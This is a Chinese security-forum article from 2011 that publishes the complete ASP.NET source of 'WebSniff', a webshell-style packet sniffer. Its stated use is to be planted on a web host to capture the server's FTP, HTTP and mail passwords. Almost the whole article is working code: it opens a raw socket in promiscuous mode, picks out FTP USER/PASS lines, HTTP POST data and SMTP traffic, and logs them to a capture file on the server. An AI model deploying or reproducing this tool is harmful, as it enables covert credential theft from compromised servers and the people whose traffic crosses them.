首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>网络安全>文章内容
web sniffer 在线嗅探/online http sniff,还有一个webshell sniffer
来源:vfocus.net 作者:linx 发布时间:2011-05-27  

http://web-sniffer.net/是在线的web sniff。

还有一个webshell的,放在asp.net的空间,嗅探本服务器的ftp,http,smtp,pop3等密码

支持.net 2.0,不支持1.0吧(转的)。

<%@ Page Language="C#" ValidateRequest="false" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Collections" %>
<%@ Import Namespace="System.Text" %>
<%@ Import Namespace="System.Net.NetworkInformation" %>
<%@ Import Namespace="System.Threading" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>WebSniff 1.0  Powered by  C.C.T。linx 修改版 </title>
</head>
<body>
<script runat="server">
static private Socket mainSocket;                          //The socket which captures all incoming packets
private static byte[] byteData = new byte[2048];
private static bool bContinueCapturing = true;            //A flag to check if packets are to be captured or not
static int stoppackes = 0;
static int port = 0;
static string strIP = null;
static long packets = 0;
static System.IO.FileStream wfs;
static string logfile =null;
static PacketCaptureWriter pktwt;
static string keyword;
static DateTime stoptime = System.DateTime.Now.AddYears(-8);
static Thread th;
static int minisizepacket=0;
static string proException = null;
static Boolean logNextPacket = false;
static Boolean my_s_ftp= true;
static Boolean my_s_http_post = false;
static Boolean my_s_smtp = false;
protected void Page_Load(object sender, EventArgs e)
{
   if (logfile == null)
   {
       logfile = Server.MapPath("w" + System.DateTime.Now.ToFileTime() + ".txt");
   }
   if (stoptime.Year == (System.DateTime.Now.Year - 8))
   {
       System.DateTime nextDay = System.DateTime.Now.AddDays(1);
       stoptime = nextDay;
   }
   //没有生成IP列表
   if (ddlist.Items.Count==0)
   {
       IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));
       if (HosyEntry.AddressList.Length > 0)
       {
           foreach (IPAddress ip in HosyEntry.AddressList)
           {
               ddlist.Items.Add(ip.ToString());
           }
       }
   }
   //如不是点击Starts按钮,则打印已经设过的参数
   if (Request.Form["Starts"] == null)
   {
       this.ddlist.SelectedValue = strIP;
       this.txtport.Text = port.ToString();
       this.txtMinisize.Text = minisizepacket.ToString();
       this.txtkeywords.Text = keyword;
       this.txtlogfile.Text = logfile;
       this.txtpackets.Text = stoptime.ToString();
       this.s_ftp.Checked = my_s_ftp;
       this.s_http_post.Checked = my_s_http_post;
       this.s_smtp.Checked = my_s_smtp;
   }
   if (th != null )
   {
       this.Lb_msg.Text = System.DateTime.Now.ToString()+"  State: <b>" + th.ThreadState.ToString() +"</b>  Packets: "+packets.ToString();
   }
   else
   {
       this.Lb_msg.Text = "Sniff Treads is not started";
   }
   if (Request.Form["Starts"] != null || th != null)
   {
       this.Starts.Enabled = false;
   }
   else
   {
       this.Starts.Enabled = true;
   }
   //点击了stop按钮
   if (Request.Form["Button1"] != null)
   {
       this.Starts.Enabled = true;
       this.Lb_msg.Text = System.DateTime.Now.ToString() + "  State: <b>stoping. Click \"Refresh\" again to see if thread is stoped successed.</b>  Packets: " + packets.ToString();
   }
   Lb_msg2.Text = proException; //错误信息
}
protected void Refresh_Click(object sender, EventArgs e)
{
}
protected void Stop_Click(object sender, EventArgs e)
{
   packets = stoppackes;
   //stoptime = System.DateTime.Now;
   proException += "<br>last time stop at " + System.DateTime.Now.ToString();
   bContinueCapturing = false;
 
   if (th != null)
   {
       th.Abort();
       th = null;
   }
   try
   {
       wfs.Close();
       mainSocket.Close();
   }
   catch (Exception ex)
   {
   }
}
protected void Pagestart()
{
   //记录设置过的参数
   strIP = ddlist.SelectedValue;
   port = Int32.Parse(txtport.Text);
   stoptime = Convert.ToDateTime( txtpackets.Text);
   logfile = this.txtlogfile.Text;
   keyword = txtkeywords.Text;
   minisizepacket = Int32.Parse(txtMinisize.Text);
   my_s_ftp = this.s_ftp.Checked;
   my_s_http_post = this.s_http_post.Checked;
   my_s_smtp = this.s_smtp.Checked;
   wfs = System.IO.File.Create(logfile);
   pktwt = new PacketCaptureWriter(wfs, LinkLayerType.RawIP);
   bContinueCapturing = true;
   packets = 0;
   Start();
}
private static void Start()
{
   byte[] byTrue = new byte[4] { 1, 0, 0, 0 };
   byte[] byOut = new byte[4] { 1, 0, 0, 0 };
   try
   {
       bContinueCapturing = true;
       mainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
       mainSocket.Bind(new IPEndPoint(IPAddress.Parse(strIP), 0));
       mainSocket.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, true);
       mainSocket.IOControl(IOControlCode.ReceiveAll, byTrue, byOut);
   }
   catch (Exception ex)
   {
       proException += ex.ToString()+"<BR>"; //静态方法可以访问静态变量proException
   }
   byteData = new byte[2048];
   while (System.DateTime.Now <= stoptime)
   {
       ParseData(byteData, mainSocket.Receive(byteData));
   }
   bContinueCapturing = false;
   wfs.Close();
   mainSocket.Close();
}
protected void Start_Click(object sender, EventArgs e)
{
   if (this.txtlogfile.Text == "" || txtpackets.Text.Length < 1 || txtport.Text == "") return;
   th = new Thread(new ThreadStart(Pagestart));
   th.Start();
   //Session["workthread"] = th;
   this.Lb_msg.Text = "\r\nSniffing.Click \"Refresh\" to see the lastest status.";
}
public static ushort Get2Bytes(byte[] ptr, int Index, int Type)
{
   ushort u = 0;
   if (Type == 0)
   {
       u = (ushort)ptr[Index++];
       u *= 256;
       u += (ushort)ptr[Index++];
   }
   else if (Type == 1)
   {
       u = (ushort)ptr[++Index];
       u *= 256; Index--;
       u += (ushort)ptr[Index++]; Index++;
   }
   return u;
}
private static void ParseData(byte[] byteData, int nReceived)
{
   try
   {
       byte[] nbyte = new byte[nReceived];
       Array.Copy(byteData, nbyte, nReceived);
       if ((int)nbyte[9] == 6)
       {
         
           int sport = Get2Bytes(nbyte,  20,0);
           int dport = Get2Bytes(nbyte,  22,0);
          
           String datas=Encoding.Default.GetString(nbyte);
           Boolean logIt=false;
          
           if (my_s_ftp)
           {
               if ((sport == 21 || dport == 21) &&
                   (datas.IndexOf("USER ") >= 0 || datas.IndexOf("PASS ") >= 0)
                   )
               {
                  logIt =true;                   
               }
           }
           if (!logIt && my_s_http_post)
           {
               if(logNextPacket){
                   logIt =true;
                   logNextPacket=false;
                  
               }
               if (!logIt && datas.IndexOf("POST ")>=0)
               {
                  logIt =true;
                  logNextPacket=true;
               }
              
           }
           if (!logIt && my_s_smtp && (dport == 25 || sport == 25))
           {
                logIt =true;
           }
          
           //判断端口
           if (!logIt && (dport == port || sport == port))
           {
               if (nReceived > minisizepacket)
               {
                   //判断关键字
                   if (keyword != "")
                   {
                       if (datas.IndexOf(keyword) >= 0)
                       {
                           logIt =true;
                       }
                   }
                   else
                   {
                       logIt =true;
                   }
               }
           }
           if(logIt){
                    PacketCapture pkt = new PacketCapture(nbyte, nReceived);
                       pktwt.Write(pkt);
                       packets++;
           }   
       }
   }
   catch { }
}
public struct UnixTime
{
   public static readonly DateTime MinDateTime = new DateTime(1970, 1, 1, 0, 0, 0);
   public static readonly DateTime MaxDateTime = new DateTime(2038, 1, 19, 3, 14, 7);
   private readonly int _Value;
   public UnixTime(int value)
   {
       if (value < 0)
           throw new ArgumentOutOfRangeException("value");
       _Value = value;
   }
   public int Value
   {
       get { return _Value; }
   }
   public DateTime ToDateTime()
   {
       const long START = 621355968000000000; // 1970-1-1 00:00:00
       return new DateTime(START + (_Value * (long)10000000)).ToLocalTime();
   }
   public static UnixTime FromDateTime(DateTime dateTime)
   {
       if (dateTime < MinDateTime || dateTime > MaxDateTime)
           throw new ArgumentOutOfRangeException("dateTime");
       TimeSpan span = dateTime.Subtract(MinDateTime);
       return new UnixTime((int)span.TotalSeconds);
   }
   public override string ToString()
   {
       return ToDateTime().ToString();
   }
}
public enum LinkLayerType : uint
{
   Null = 0,
   Ethernet = 1,
   RawIP = 101,
   User0 = 147,
   User1 = 148,
   User2 = 149,
   User3 = 150,
   User4 = 151,
   User5 = 152,
   User6 = 153,
   User7 = 154,
   User8 = 155,
   User9 = 156,
   User10 = 157,
   User11 = 158,
   User12 = 159,
   User13 = 160,
   User14 = 161,
   User15 = 162,
}
public sealed class PacketCaptureWriter
{
   #region Fields
   private const uint MAGIC = 0xA1B2C3D4;
   private readonly Stream _BaseStream;
   private readonly LinkLayerType _LinkLayerType;
   private readonly int _MaxPacketLength;
   private readonly BinaryWriter m_Writer;
   private bool m_ExistHeader = false;
   private int _TimeZone;
   private int _CaptureTimestamp;
   #endregion
   #region Constructors
   public PacketCaptureWriter(
       Stream baseStream, LinkLayerType linkLayerType,
       int maxPacketLength, int captureTimestamp)
   {
       if (baseStream == null) throw new ArgumentNullException("baseStream");
       if (maxPacketLength < 0) throw new ArgumentOutOfRangeException("maxPacketLength");
       if (!baseStream.CanWrite) throw new ArgumentException("Cant'Wirte Stream");
       _BaseStream = baseStream;
       _LinkLayerType = linkLayerType;
       _MaxPacketLength = maxPacketLength;
       _CaptureTimestamp = captureTimestamp;
       m_Writer = new BinaryWriter(_BaseStream);
   }
   public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType, int captureTimestamp)
       : this(baseStream, linkLayerType, 0xFFFF, captureTimestamp)
   {
   }
   public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType)
       : this(baseStream, linkLayerType, 0xFFFF, UnixTime.FromDateTime(DateTime.Now).Value)
   {
   }
   #endregion
   #region Properties
   public short VersionMajor
   {
       get { return 2; }
   }
   public short VersionMinjor
   {
       get { return 4; }
   }
   public int TimeZone
   {
       get { return _TimeZone; }
       set { _TimeZone = value; }
   }
   public int CaptureTimestamp
   {
       get { return _CaptureTimestamp; }
       set { _CaptureTimestamp = value; }
   }
   public Stream BaseStream
   {
       get { return _BaseStream; }
   }
   public LinkLayerType LinkLaterType
   {
       get { return _LinkLayerType; }
   }
   public int MaxPacketLength
   {
       get { return _MaxPacketLength; }
   }
   #endregion
   public void Write(PacketCapture packet)
   {
       CheckHeader();
       m_Writer.Write(packet.Timestamp.Value);
       m_Writer.Write(packet.Millseconds);
       m_Writer.Write(packet.Packet.Count);
       m_Writer.Write(packet.RawLength);
       m_Writer.Write(packet.Packet.Array, packet.Packet.Offset, packet.Packet.Count);
   }
   public void Flush()
   {
       BaseStream.Flush();
   }
   private void CheckHeader()
   {
       if (!m_ExistHeader)
       {
           m_Writer.Write(MAGIC);
           m_Writer.Write(VersionMajor);
           m_Writer.Write(VersionMinjor);
           m_Writer.Write(TimeZone);
           m_Writer.Write(CaptureTimestamp);
           m_Writer.Write(MaxPacketLength);
           m_Writer.Write((uint)LinkLaterType);
           m_ExistHeader = true;
       }
   }
}
public sealed class PacketCapture
{
   private readonly UnixTime _Timestamp;
   private readonly ArraySegment<byte> _Packet;
   private readonly int _RawLength;
   private readonly int _Millseconds;
   public PacketCapture(ArraySegment<byte> packet, int rawLength, UnixTime timestamp, int millseconds)
   {
       if (packet.Count > rawLength)
           throw new ArgumentException("Length Error", "rawLength");
       _Packet = packet;
       _Timestamp = timestamp;
       _RawLength = rawLength;
       _Millseconds = millseconds;
   }
   public PacketCapture(ArraySegment<byte> packet, int rawLength, DateTime timestamp)
       : this(packet, rawLength, UnixTime.FromDateTime(timestamp), 0)
   {
   }
   public PacketCapture(ArraySegment<byte> packet, int rawLength)
       : this(packet, rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
   {
   }
   public PacketCapture(ArraySegment<byte> packet)
       : this(packet, packet.Count)
   {
   }
   public PacketCapture(byte[] packetData, int offset, int count, int rawLength, UnixTime timestamp, int millseconds)
       : this(new ArraySegment<byte>(packetData, offset, count), rawLength, timestamp, millseconds)
   {
   }
   public PacketCapture(byte[] packetData, int offset, int count, int rawLength, DateTime timestamp)
       : this(new ArraySegment<byte>(packetData, offset, count), rawLength, UnixTime.FromDateTime(timestamp), 0)
   {
   }
   public PacketCapture(byte[] packetData, int rawLength, UnixTime timestamp, int millseconds)
       : this(new ArraySegment<byte>(packetData), rawLength, timestamp, millseconds)
   {
   }
   public PacketCapture(byte[] packetData, int rawLength, DateTime timestamp)
       : this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(timestamp), 0)
   {
   }
   public PacketCapture(byte[] packetData, int rawLength)
       : this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
   {
   }
   public PacketCapture(byte[] packetData)
       : this(packetData, packetData.Length)
   {
   }
   public ArraySegment<byte> Packet
   {
       get { return _Packet; }
   }
   public UnixTime Timestamp
   {
       get { return _Timestamp; }
   }
   public int Millseconds
   {
       get { return _Millseconds; }
   }
   public int RawLength
   {
       get { return _RawLength; }
   }
}
</script>
<style type="text/css">
<!--
a {
color: #FF0000  ;text-decoration: none
}
#b
{
color: #336699;
font-size: 10pt;
text-align: right;
}
#tt
{
vertical-align: middle;
font-size: 12pt;
text-align: center;
}
#Ct_2
{
padding-left:30px;
font-size: 10pt;
color: #336699;
vertical-align: middle;
text-align: left;
background-color: aliceblue;
border-width: 1px;
border-style: solid;
border-color: -moz-use-text-color;
padding-bottom:10px;
}
-->
</style>
<form id="form1" runat="server">
<div id="tt">  <b> WebSniff 1.0</b><br /><br />  </div>
<div id="Ct_2" >
<table width="100%" >
 <tr >
       <td  width="10%"> BindIP: </td>
       <td ><asp:DropDownList ID="ddlist" runat="server" width="90%"></asp:DropDownList></td>
   </tr>
 <tr >
       <td  width="10%">Auto sniff: </td>
       <td >
       FTP Password:
        <asp:CheckBox ID="s_ftp" runat="server" Checked />
        &nbsp;&nbsp;
        HTTP Post Data:
         <asp:CheckBox ID="s_http_post" runat="server" />
         &nbsp;&nbsp;
        
         Smtp Data:
          <asp:CheckBox ID="s_smtp" runat="server" />
      
      
       </td>
   </tr>
             
   <tr>
       <td ">
           FilterPort:
       </td>
       <td>
           <asp:TextBox ID="txtport" Text="0"  width="90%" runat="server"></asp:TextBox>
       </td>
   </tr>
   <tr>
       <td >
           MiniSizeToCapture:
       </td>
       <td >
           <asp:TextBox ID="txtMinisize" Text="0"  width="90%" runat="server" ></asp:TextBox>
       </td>
   </tr>
   <tr>
       <td>
           KeyWordsFilter:
       </td>
       <td>
           <asp:TextBox ID="txtkeywords" runat="server"   width="90%" Text=""></asp:TextBox>
       </td>
   </tr>
   <tr>
       <td >
           LogFile:
       </td>
       <td>
           <asp:TextBox ID="txtlogfile" runat="server"   width="90%" Text="log.log" ></asp:TextBox>
       </td>
   </tr>
   <tr>
       <td >
           Stop At Time:
       </td>
       <td>
           <asp:TextBox ID="txtpackets" runat="server"  width="90%" Text="300"></asp:TextBox>
       </td>
   </tr>
 <tr>
       <td >
              Control:
       </td>
       <td   width="90%" >  <asp:Button ID="Starts" runat="server" OnClick="Start_Click" Text="Start" />
    <asp:Button ID="Button1" runat="server" OnClick="Stop_Click" Text="Stop" />
             <asp:Button ID="Button_ref" runat="server" OnClick="Refresh_Click" Text="Refresh/View Status" /><br />
       </td>
   </tr>
 <tr>
       <td  >
              Status:
       </td>
       <td   width="90%"><div id="s"><asp:Label ID="Lb_msg" runat="server" Text=""></div></asp:Label>
       </td>
   </tr>
 <tr>
       <td  >
             
       </td>
       <td   width="90%"><div id="s"><asp:Label ID="Lb_msg2" runat="server" Text=""></div></asp:Label>
       </td>
   </tr>
</table>
</div><br /><br />
<div id=b>Powered by <a href="//www.cncert.net"> _fcksavedurl=""//www.cncert.net">" C.C.T </a>|Version 1.0
<a href=" http://hi.baidu.com/cnqing/blog/item/92d8b35008ad871f377abee4.html">1</a>
<a href="http://hi.baidu.com/linx2008/blog/item/7020f1de1b1c805395ee3768.html">2</a>
</div>
</form>
</body>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·一句话木马
·samcrypt.lib简介
·教你轻松查看QQ空间加密后的好友
·Cisco PIX525 配置备忘
·用Iptables+Fedora做ADSL 路由器
·检查 Web 应用安全的几款开源免
·SPIKE与Peach Fuzzer相关知识
·Md5(base64)加密与解密实战
·asp,php,aspx一句话集合
·NT下动态切换进程分析笔记
·风险评估中的渗透测试
·动网暴力破解密码程序代码
  相关文章
·利用PHP编程防范XSS跨站脚本攻击
·PHP中的密码学算法及其应用2-对
·Content-Type 防范 XSS 绕过
·Web开发框架安全杂谈
·记录一次网站被黑抓马记
·从真实故事说起 读黑客战术社会
·麻烦的终结者
·asp,php,aspx一句话集合
·常见 Webshell 的检测方法及检测
·浅谈Ddos攻击攻击与防御
·浅谈新型的sql注入测试
·Auto pentesting. Nmap, SSLscan
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved